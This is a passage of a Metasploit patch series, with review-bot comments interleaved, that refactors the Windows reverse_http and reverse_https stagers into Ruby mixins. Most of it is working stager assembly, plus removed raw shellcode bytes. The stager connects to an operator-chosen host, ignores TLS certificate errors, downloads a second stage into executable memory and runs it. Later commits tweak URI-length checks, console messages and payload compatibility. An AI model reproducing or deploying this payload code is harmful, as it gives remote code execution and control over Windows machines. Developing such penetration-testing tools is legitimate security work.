+ #{asm_block_api} + start: + pop ebp + #{asm_reverse_http(opts)} + ^ + Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string + end + + # + # Generate the URI for the initial stager + # + def generate_uri + # Maximum URL is limited to https:// plus 256 bytes, figure out our maximum URI + uri_max_len = 256 - "#{datastore['LHOST']}:#{datastore['LPORT']}/".length + uri_req_len = datastore['HTTPStagerURILength'].to_i + + if uri_req_len > 0 + + if uri_req_len > uri_max_len + raise ArgumentError, "Maximum HTTPStagerURILength is #{uri_max_len}" + end + + if uri_req_len < 5 + raise ArgumentError, "Minimum HTTPStagerURILength is 5" + end + + return "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW, uri_req_len) + end + + # Generate a random 30+ byte URI + "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW, 30 + rand(uri_max_len-30)) + end + + # + # Determine the maximum amount of space required for the features requested + # + def required_space + # Start with our cached default generated size + space = cached_size + + # Add 100 bytes for the encoder to have some room + space += 100 + + # Add 251 bytes for large URI support (technically a little less, but lets go with it) + space += 251 + + # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others) + space += 31 + + # The final estimated size + space + end + + # + # Dynamic payload generation + # + def asm_reverse_http(opts={}) + + # + # options should contain: + # ssl: (true|false) + # url: "/url_to_request" + # host: [hostname] + # port: [port] + # exitfunk: [process|thread|seh|sleep] + # + + http_open_flags = 0 + + if opts[:ssl] + #;0x80000000 | ; INTERNET_FLAG_RELOAD + #;0x04000000 | ; INTERNET_NO_CACHE_WRITE + #;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION + #;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT + #;0x00000200 | ; INTERNET_FLAG_NO_UI + #;0x00800000 | ; INTERNET_FLAG_SECURE + #;0x00002000 | ; 
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID + #;0x00001000 ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID + http_open_flags = ( 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000 ) + else + #;0x80000000 | ; INTERNET_FLAG_RELOAD + #;0x04000000 | ; INTERNET_NO_CACHE_WRITE + #;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION + #;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT + #;0x00000200 ; INTERNET_FLAG_NO_UI + http_open_flags = ( 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 ) + end + + asm = %Q^ + ;-----------------------------------------------------------------------------; + ; Author: HD Moore + ; Compatible: Confirmed Windows 7, Windows 2008 Server, Windows XP SP1, Windows SP3, Windows 2000 + ; Known Bugs: Incompatible with Windows NT 4.0, buggy on Windows XP Embedded (SP1) + ; Version: 1.0 + ;-----------------------------------------------------------------------------; + + ; Input: EBP must be the address of 'api_call'. + ; Output: EDI will be the socket for the connection to the server + ; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0) + load_wininet: + push 0x0074656e ; Push the bytes 'wininet',0 onto the stack. + push 0x696e6977 ; ... + push esp ; Push a pointer to the "wininet" string on the stack. 
+ push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + call ebp ; LoadLibraryA( "wininet" ) + + set_retry: + push.i8 8 ; retry 8 times should be enough + pop edi + xor ebx, ebx ; push 8 zeros ([1]-[8]) + mov ecx, edi + push_zeros: + push ebx + loop push_zeros + + internetopen: + ; DWORD dwFlags [1] + ; LPCTSTR lpszProxyBypass (NULL) [2] + ; LPCTSTR lpszProxyName (NULL) [3] + ; DWORD dwAccessType (PRECONFIG = 0) [4] + ; LPCTSTR lpszAgent (NULL) [5] + push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" ) + call ebp + + internetconnect: + ; DWORD_PTR dwContext (NULL) [6] + ; dwFlags [7] + push.i8 3 ; DWORD dwService (INTERNET_SERVICE_HTTP) + push ebx ; password (NULL) + push ebx ; username (NULL) + push #{opts[:port]} ; PORT + call got_server_uri ; double call to get pointer for both server_uri and + server_uri: ; server_host; server_uri is saved in EDI for later + db "#{opts[:url]}", 0x00 + got_server_host: + push eax ; HINTERNET hInternet + push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" ) + call ebp + + httpopenrequest: + ; dwContext (NULL) [8] + push #{"0x%.8x" % http_open_flags} ; dwFlags + push ebx ; accept types + push ebx ; referrer + push ebx ; version + push edi ; server URI + push ebx ; method + push eax ; hConnection + push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" ) + call ebp + xchg esi, eax ; save hHttpRequest in esi + + send_request: + ^ + + if opts[:ssl] + asm << %Q^ + ; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) ); + set_security_options: + push 0x00003380 + ;0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID + ;0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID + ;0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE + ;0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA + ;0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION + mov eax, esp + push.i8 4 ; sizeof(dwFlags) + push eax ; &dwFlags + push.i8 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS) + push esi ; hHttpRequest + push 
0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" ) + call ebp + ^ + end + + asm << %Q^ + httpsendrequest: + push ebx ; lpOptional length (0) + push ebx ; lpOptional (NULL) + push ebx ; dwHeadersLength (0) + push ebx ; lpszHeaders (NULL) + push esi ; hHttpRequest + push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" ) + call ebp + test eax,eax + jnz allocate_memory + + try_it_again: + dec edi + jnz send_request + + ; if we didn't allocate before running out of retries, bail out + ^ + + if opts[:exitfunk] + asm << %Q^ + failure: + call exitfunk + ^ + else + asm << %Q^ + failure: + push 0x56A2B5F0 ; hardcoded to exitprocess for size + call ebp + ^ + end + + asm << %Q^ + allocate_memory: + push.i8 0x40 ; PAGE_EXECUTE_READWRITE + push 0x1000 ; MEM_COMMIT + push 0x00400000 ; Stage allocation (4Mb ought to do us) + push ebx ; NULL as we dont care where the allocation is + push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" ) + call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); + + download_prep: + xchg eax, ebx ; place the allocated base address in ebx + push ebx ; store a copy of the stage base address on the stack + push ebx ; temporary storage for bytes read count + mov edi, esp ; &bytesRead + + download_more: + push edi ; &bytesRead + push 8192 ; read length + push ebx ; buffer + push esi ; hRequest + push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" ) + call ebp + + test eax,eax ; download failed? (optional?) + jz failure + + mov eax, [edi] + add ebx, eax ; buffer += bytes_received + + test eax,eax ; optional? + jnz download_more ; continue until it returns 0 + pop eax ; clear the temporary storage + + execute_stage: + ret ; dive into the stored stage address + + got_server_uri: + pop edi + call got_server_host + + server_host: + db "#{opts[:host]}", 0x00 + ^ + + if opts[:exitfunk] + asm << asm_exitfunk(opts) + end + asm + end + + # + # Do not transmit the stage over the connection. 
We handle this via HTTPS + # + def stage_over_connection? + false + end + + # + # Always wait at least 20 seconds for this payload (due to staging delays) + # + def wfs_delay + 20 + end + + +end + +end + diff --git a/lib/msf/core/payload/windows/reverse_https.rb b/lib/msf/core/payload/windows/reverse_https.rb new file mode 100644 index 0000000000..b22ebbe048 --- /dev/null +++ b/lib/msf/core/payload/windows/reverse_https.rb @@ -0,0 +1,63 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'msf/core/payload/windows/reverse_http' + +module Msf + + +### +# +# Complex payload generation for Windows ARCH_X86 that speak HTTPS +# +### + + +module Payload::Windows::ReverseHttps + + include Msf::Payload::Windows::ReverseHttp + + # + # Generate and compile the stager + # + def generate_reverse_https(opts={}) + combined_asm = %Q^ + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. + #{asm_block_api} + start: + pop ebp + #{asm_reverse_http(opts)} + ^ + Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string + end + + # + # Generate the first stage + # + def generate + + # Generate the simple version of this stager if we don't have enough space + if self.available_space.nil? || required_space > self.available_space + return generate_reverse_https( + host: datastore['LHOST'], + port: datastore['LPORT'], + url: "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW), + ssl: true) + end + + conf = { + ssl: true, + host: datastore['LHOST'], + port: datastore['LPORT'], + url: generate_uri, + exitfunk: datastore['EXITFUNC'] + } + + generate_reverse_https(conf) + end + +end + +end + diff --git a/modules/payloads/stagers/windows/reverse_http.rb b/modules/payloads/stagers/windows/reverse_http.rb index d4b6328d7c..94bb21082d 100644 --- a/modules/payloads/stagers/windows/reverse_http.rb +++ b/modules/payloads/stagers/windows/reverse_http.rb 
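Review bot: asm_reverse_http interpolates `opts[:host]` straight into `db "#{opts[:host]}", 0x00`, which drops the IPv6 handling the old stager had (the removed generate in modules/payloads/stagers/windows/reverse_http.rb wrapped an IPv6 LHOST in brackets before appending it), so an IPv6 listener now yields a bare address in server_host. Normalising once before the heredoc, `host = opts[:host].to_s` then `host = "[#{host}]" if Rex::Socket.is_ipv6?(host)`, and emitting `db "#{host}", 0x00` restores the previous behaviour. opts[:url] and opts[:port] are embedded the same way and rely on the datastore having validated them; a comment at the top of asm_reverse_http stating that assumption would help the next reader.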
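Review bot: generate_reverse_https is a line-for-line copy of generate_reverse_http from the module it includes (same cld / call start / pop ebp wrapper and the same Metasm assemble call), and ReverseHttps#generate differs from ReverseHttp#generate only by `ssl: true`. Delegating, `def generate_reverse_https(opts={})` / `generate_reverse_http(opts)` / `end`, leaves a single assembler wrapper to maintain. The module header comment should then state that the only thing this mixin adds over ReverseHttp is the ssl flag.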
@@ -6,14 +6,15 @@ require 'msf/core' require 'msf/core/handler/reverse_http' - +require 'msf/core/payload/windows/reverse_http' module Metasploit3 - CachedSize = 322 + CachedSize = 306 include Msf::Payload::Stager include Msf::Payload::Windows + include Msf::Payload::Windows::ReverseHttp def initialize(info = {}) super(merge_info(info, 
@@ -24,68 +25,6 @@ module Metasploit3 'Platform' => 'win', 'Arch' => ARCH_X86, 'Handler' => Msf::Handler::ReverseHttp, - 'Convention' => 'sockedi http', - 'Stager' => - { - 'Offsets' => - { - # Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now) - # 'EXITFUNC' => [ 240, 'V' ], - 'LPORT' => [ 177, 'v' ], # Not a typo, really little endian - }, - 'Payload' => - "\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" + - "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" + - "\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" + - "\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" + - "\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" + - "\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" + - "\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" + - "\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" + - "\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x68\x6E\x65\x74\x00\x68\x77" + - "\x69\x6E\x69\x54\x68\x4C\x77\x26\x07\xFF\xD5\x6A\x08\x5F\x31\xDB" + - "\x89\xF9\x53\xE2\xFD\x68\x3A\x56\x79\xA7\xFF\xD5\x6A\x03\x53\x53" + - "\x68\x5C\x11\x00\x00\xE8\x72\x00\x00\x00\x2F\x31\x32\x33\x34\x35" + - "\x00\x50\x68\x57\x89\x9F\xC6\xFF\xD5\x68\x00\x02\x60\x84\x53\x53" + - "\x53\x57\x53\x50\x68\xEB\x55\x2E\x3B\xFF\xD5\x96\x53\x53\x53\x53" + - "\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x0A\x4F\x75\xED\x68" + - "\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00" + - "\x40\x00\x53\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57" + - "\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0" + - "\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\x5F\xE8\x8F\xFF" + - "\xFF\xFF" - } - )) - end - - # - # Do not transmit the stage over the connection. We handle this via HTTPS - # - def stage_over_connection? 
- false - end - - # - # Generate the first stage - # - def generate - p = super - i = p.index("/12345\x00") - u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00" - p[i, u.length] = u - - lhost = datastore['LHOST'] || '127.127.127.127' - if Rex::Socket.is_ipv6?(lhost) - lhost = "[#{lhost}]" - end - - p + lhost + "\x00" - end - - # - # Always wait at least 20 seconds for this payload (due to staging delays) - # - def wfs_delay - 20 + 'Convention' => 'sockedi http')) end end diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb index 2821b0be3c..92ea6ee42f 100644 --- a/modules/payloads/stagers/windows/reverse_https.rb +++ b/modules/payloads/stagers/windows/reverse_https.rb @@ -6,14 +6,16 @@ require 'msf/core' require 'msf/core/handler/reverse_https' +require 'msf/core/payload/windows/reverse_https' module Metasploit3 - CachedSize = 327 + CachedSize = 326 include Msf::Payload::Stager include Msf::Payload::Windows + include Msf::Payload::Windows::ReverseHttps def initialize(info = {}) super(merge_info(info, 
@@ -24,64 +26,7 @@ module Metasploit3 'Platform' => 'win', 'Arch' => ARCH_X86, 'Handler' => Msf::Handler::ReverseHttps, - 'Convention' => 'sockedi https', - 'Stager' => - { - 'Offsets' => - { - # Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now) - # 'EXITFUNC' => [ 260, 'V' ], - 'LPORT' => [ 177, 'v' ], # Not a typo, really little endian - }, - 'Payload' => - "\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" + - "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" + - "\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" + - "\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" + - "\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" + - "\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" + - "\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" + - "\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" + - "\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x68\x6E\x65\x74\x00\x68\x77" + - "\x69\x6E\x69\x54\x68\x4C\x77\x26\x07\xFF\xD5\x6A\x08\x5F\x31\xDB" + - "\x89\xF9\x53\xE2\xFD\x68\x3A\x56\x79\xA7\xFF\xD5\x6A\x03\x53\x53" + - "\x68\x5C\x11\x00\x00\xE8\x86\x00\x00\x00\x2F\x31\x32\x33\x34\x35" + - "\x00\x50\x68\x57\x89\x9F\xC6\xFF\xD5\x68\x00\x32\xE0\x84\x53\x53" + - "\x53\x57\x53\x50\x68\xEB\x55\x2E\x3B\xFF\xD5\x96\x68\x80\x33\x00" + - "\x00\x89\xE0\x6A\x04\x50\x6A\x1F\x56\x68\x75\x46\x9E\x86\xFF\xD5" + - "\x53\x53\x53\x53\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x0A" + - "\x4F\x75\xD9\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00" + - "\x00\x68\x00\x00\x40\x00\x53\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53" + - "\x53\x89\xE7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2" + - "\xFF\xD5\x85\xC0\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3" + - "\x5F\xE8\x7B\xFF\xFF\xFF" - - } - )) + 'Convention' => 'sockedi https')) end - # - # Do not transmit the stage over the connection. 
We handle this via HTTPS - # - def stage_over_connection? - false - end - - # - # Generate the first stage - # - def generate - p = super - i = p.index("/12345\x00") - u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW) + "\x00" - p[i, u.length] = u - p + datastore['LHOST'].to_s + "\x00" - end - - # - # Always wait at least 20 seconds for this payload (due to staging delays) - # - def wfs_delay - 20 - end end diff --git a/modules/payloads/stagers/windows/x64/reverse_https.rb b/modules/payloads/stagers/windows/x64/reverse_https.rb index ee236022f8..08fe6ef5a6 100644 --- a/modules/payloads/stagers/windows/x64/reverse_https.rb +++ b/modules/payloads/stagers/windows/x64/reverse_https.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/handler/reverse_https' - +#require 'msf/core/payload/windows/x64/reverse_https' module Metasploit3 diff --git a/spec/lib/msf/core/handler/reverse_http/uri_checksum_spec.rb b/spec/lib/msf/core/handler/reverse_http/uri_checksum_spec.rb index 51d83619a3..7051b82e5a 100644 --- a/spec/lib/msf/core/handler/reverse_http/uri_checksum_spec.rb +++ b/spec/lib/msf/core/handler/reverse_http/uri_checksum_spec.rb @@ -9,6 +9,7 @@ describe Msf::Handler::ReverseHttp::UriChecksum do subject(:dummy_object) { DummyClass.new } it { should respond_to :generate_uri_checksum} + it { should respond_to :generate_uri_checksum_with_length} it { should respond_to :process_uri_resource} describe '#generate_uri_checksum' do 
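Review bot: The x64 stager gains a commented-out `#require 'msf/core/payload/windows/x64/reverse_https'`, but no such file is added by this series (the diffstat lists only the x86 mixins), so the line is dead text that invites the next reader to look for a module that does not exist. Either drop it or make the intent explicit, `# TODO: port to a Msf::Payload::Windows x64 ReverseHttps mixin once one exists`.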
@@ -28,6 +29,18 @@ describe Msf::Handler::ReverseHttp::UriChecksum do end end + describe '#generate_uri_checksum_with_length' do + [0, 80, 88, 90, 92, 98, 255, 127].each do |checksum_value| + [5,30,50,100,127].each do |uri_length| + it "generates a #{uri_length} byte string that checksums back to the original value (#{checksum_value})" do + uri_string = dummy_object.generate_uri_checksum_with_length(checksum_value, uri_length) + expect(Rex::Text.checksum8(uri_string)).to eq checksum_value + end + end + end + + end + describe '#process_uri_resource' do context 'when passed a value for INITW' do let(:uri) { "/7E37v"} From 72e76913002b08242b45ee6171373f76bc6575f5 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 10 Mar 2015 13:31:25 -0500 Subject: [PATCH 09/18] Change print_status to print_error And drop db_disconnect note to another line. --- lib/msf/ui/console/command_dispatcher/db.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index 0ba92f5c4c..eabc730917 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -1713,8 +1713,8 @@ class Db cdb = conn.current_database end end - print_status("#{framework.db.driver} already connected to #{cdb}. " + - "Run db_disconnect first if you wish to connect to a different database.") + print_error("#{framework.db.driver} already connected to #{cdb}") + print_error("Run db_disconnect first if you wish to connect to a different database") return end if (args[0] == "-y") From 3c7b061e0579762e55253b4316dc39b276d15a07 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 10 Mar 2015 14:03:13 -0500 Subject: [PATCH 10/18] Use single quotes But I like double quotes. :( --- lib/msf/ui/console/command_dispatcher/db.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) 
diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index eabc730917..38a02710e5 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -1687,7 +1687,7 @@ class Db return if not db_check_driver if framework.db.connection_established? - cdb = "" + cdb = '' ::ActiveRecord::Base.connection_pool.with_connection do |conn| if conn.respond_to?(:current_database) cdb = conn.current_database @@ -1707,14 +1707,14 @@ class Db def cmd_db_connect(*args) return if not db_check_driver if args[0] != '-h' && framework.db.connection_established? - cdb = "" + cdb = '' ::ActiveRecord::Base.connection_pool.with_connection do |conn| if conn.respond_to?(:current_database) cdb = conn.current_database end end print_error("#{framework.db.driver} already connected to #{cdb}") - print_error("Run db_disconnect first if you wish to connect to a different database") + print_error('Run db_disconnect first if you wish to connect to a different database') return end if (args[0] == "-y") From 261159aa660b10371a720ad616bac05d670e095d Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 10 Mar 2015 14:38:01 -0500 Subject: [PATCH 11/18] update lockfile --- Gemfile.lock | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 747550796d..fa2547a62f 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -22,7 +22,7 @@ PATH tzinfo metasploit-framework-db (4.11.0.pre.dev) activerecord (>= 3.2.21, < 4.0.0) - metasploit-credential (~> 0.14.2) + metasploit-credential (~> 0.14.3) metasploit-framework (= 4.11.0.pre.dev) metasploit_data_models (~> 0.23.0) pg (>= 0.11) @@ -112,7 +112,7 @@ GEM metasploit-concern (0.3.0) activesupport (~> 3.0, >= 3.0.0) railties (< 4.0.0) - metasploit-credential (0.14.2) + metasploit-credential (0.14.3) metasploit-concern (~> 0.3.0) metasploit-model (~> 0.29.0) metasploit_data_models (~> 0.23.0) 
From dedf3726ea975321f0c24573557615b22ce1218e Mon Sep 17 00:00:00 2001 From: HD Moore Date: Tue, 10 Mar 2015 15:12:02 -0500 Subject: [PATCH 12/18] Simplify the uri_req_len logic, thanks @bcook-r7 --- lib/msf/core/payload/windows/reverse_http.rb | 24 +++++++++----------- 1 file changed, 11 insertions(+), 13 deletions(-) diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb index c6bb96b3c4..763b9f1d25 100644 --- a/lib/msf/core/payload/windows/reverse_http.rb +++ b/lib/msf/core/payload/windows/reverse_http.rb @@ -77,21 +77,19 @@ module Payload::Windows::ReverseHttp uri_max_len = 256 - "#{datastore['LHOST']}:#{datastore['LPORT']}/".length uri_req_len = datastore['HTTPStagerURILength'].to_i - if uri_req_len > 0 - - if uri_req_len > uri_max_len - raise ArgumentError, "Maximum HTTPStagerURILength is #{uri_max_len}" - end - - if uri_req_len < 5 - raise ArgumentError, "Minimum HTTPStagerURILength is 5" - end - - return "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW, uri_req_len) + if uri_req_len == 0 + uri_req_len = 30 + rand(uri_max_len-30) end - # Generate a random 30+ byte URI - "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW, 30 + rand(uri_max_len-30)) + if uri_req_len > uri_max_len + raise ArgumentError, "Maximum HTTPStagerURILength is #{uri_max_len}" + end + + if uri_req_len < 5 + raise ArgumentError, "Minimum HTTPStagerURILength is 5" + end + + "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW, uri_req_len) end # From 5f382e539a96e4cc545f98dc87273df899dc6ba2 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Tue, 10 Mar 2015 15:17:09 -0500 Subject: [PATCH 13/18] Updated required_space to count all 256 bytes of the URL --- lib/msf/core/payload/windows/reverse_http.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb index 763b9f1d25..f8fd67a4c1 100644 --- a/lib/msf/core/payload/windows/reverse_http.rb +++ b/lib/msf/core/payload/windows/reverse_http.rb @@ -102,8 +102,8 @@ module Payload::Windows::ReverseHttp # Add 100 bytes for the encoder to have some room space += 100 - # Add 251 bytes for large URI support (technically a little less, but lets go with it) - space += 251 + # Make room for the maximum possible URL length + space += 256 # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others) space += 31 From 1d17e9ab5b46e95dfffd081b8d5b1f14a6e691b9 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Tue, 10 Mar 2015 15:27:04 -0500 Subject: [PATCH 14/18] Remove the 256 byte limit for URLs --- lib/msf/core/payload/windows/reverse_http.rb | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb index f8fd67a4c1..5cd16869ca 100644 --- a/lib/msf/core/payload/windows/reverse_http.rb +++ b/lib/msf/core/payload/windows/reverse_http.rb @@ -26,7 +26,7 @@ module Payload::Windows::ReverseHttp super register_advanced_options( [ - OptInt.new('HTTPStagerURILength', [false, 'The URI length for the stager (5 to 240ish bytes)']) + OptInt.new('HTTPStagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']) ], self.class) end 
@@ -73,16 +73,12 @@ module Payload::Windows::ReverseHttp
 # Generate the URI for the initial stager
 #
 def generate_uri
- # Maximum URL is limited to https:// plus 256 bytes, figure out our maximum URI
- uri_max_len = 256 - "#{datastore['LHOST']}:#{datastore['LPORT']}/".length
+
 uri_req_len = datastore['HTTPStagerURILength'].to_i
 
+ # Choose a random URI length between 30 and 255 bytes
 if uri_req_len == 0
- uri_req_len = 30 + rand(uri_max_len-30)
- end
-
- if uri_req_len > uri_max_len
- raise ArgumentError, "Maximum HTTPStagerURILength is #{uri_max_len}"
+ uri_req_len = 30 + rand(256-30)
 end
 
 if uri_req_len < 5
From 9ade107325af97015fac231c9939118bb51aeba4 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Tue, 10 Mar 2015 16:54:56 -0500
Subject: [PATCH 15/18] disable reverse_http methods from upexec and shell payloads
These don't work over http and don't appear to have ever, as far back as I could test. They appear to be an accident perhaps.
---
 modules/payloads/stages/windows/shell.rb | 2 +-
 modules/payloads/stages/windows/upexec.rb | 2 +-
 modules/payloads/stages/windows/x64/shell.rb | 2 +-
 3 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/modules/payloads/stages/windows/shell.rb b/modules/payloads/stages/windows/shell.rb
index 70411fa234..80f95c50f6 100644
--- a/modules/payloads/stages/windows/shell.rb
+++ b/modules/payloads/stages/windows/shell.rb
@@ -23,7 +23,7 @@ module Metasploit3
 'Session' => Msf::Sessions::CommandShellWindows,
 'PayloadCompat' =>
 {
- 'Convention' => 'sockedi -https'
+ 'Convention' => 'sockedi -http -https'
 },
 'Stage' =>
 {
diff --git a/modules/payloads/stages/windows/upexec.rb b/modules/payloads/stages/windows/upexec.rb
index eae0067d3a..1d833ed93a 100644
--- a/modules/payloads/stages/windows/upexec.rb
+++ b/modules/payloads/stages/windows/upexec.rb
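Review bot: Dropping the `uri_req_len > uri_max_len` check leaves a user-supplied HTTPStagerURILength with no upper bound, while required_space (changed in the preceding commit of this series) still reserves exactly 256 bytes for the URL; a configured length well above 255 now yields a URI larger than the space the stager was sized for, and the option text "(at least 5 bytes)" gives no hint that such a limit exists. If the 256-byte URL budget still holds, keep a bound tied to it, e.g. `raise ArgumentError, "Maximum HTTPStagerURILength is 255" if uri_req_len > 255`; if unbounded URIs are really intended, required_space should be derived from the chosen length instead of a constant. The new comment `# Choose a random URI length between 30 and 255 bytes` correctly describes `30 + rand(256-30)`. generate_uri continues past the end of the hunk.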
@@ -23,7 +23,7 @@ module Metasploit3
 'Session' => Msf::Sessions::CommandShellWindows,
 'PayloadCompat' =>
 {
- 'Convention' => 'sockedi -https'
+ 'Convention' => 'sockedi -http -https'
 },
 'Stage' =>
 {
diff --git a/modules/payloads/stages/windows/x64/shell.rb b/modules/payloads/stages/windows/x64/shell.rb
index 7e325830ae..4e511bd5ff 100644
--- a/modules/payloads/stages/windows/x64/shell.rb
+++ b/modules/payloads/stages/windows/x64/shell.rb
@@ -23,7 +23,7 @@ module Metasploit3
 'Session' => Msf::Sessions::CommandShellWindows,
 'PayloadCompat' =>
 {
- 'Convention' => 'sockrdi'
+ 'Convention' => 'sockrdi -http -https'
 },
 'Stage' =>
 {
From a89926b6634043caa7a42727bf87170e225c858b Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Wed, 11 Mar 2015 00:46:04 -0500
Subject: [PATCH 16/18] Exclude vncinject from http stagers (depends on sockedi)
---
 modules/payloads/stages/windows/vncinject.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/modules/payloads/stages/windows/vncinject.rb b/modules/payloads/stages/windows/vncinject.rb
index efb9919940..2a634ddf58 100644
--- a/modules/payloads/stages/windows/vncinject.rb
+++ b/modules/payloads/stages/windows/vncinject.rb
@@ -25,7 +25,8 @@ module Metasploit3
 'Name' => 'VNC Server (Reflective Injection)',
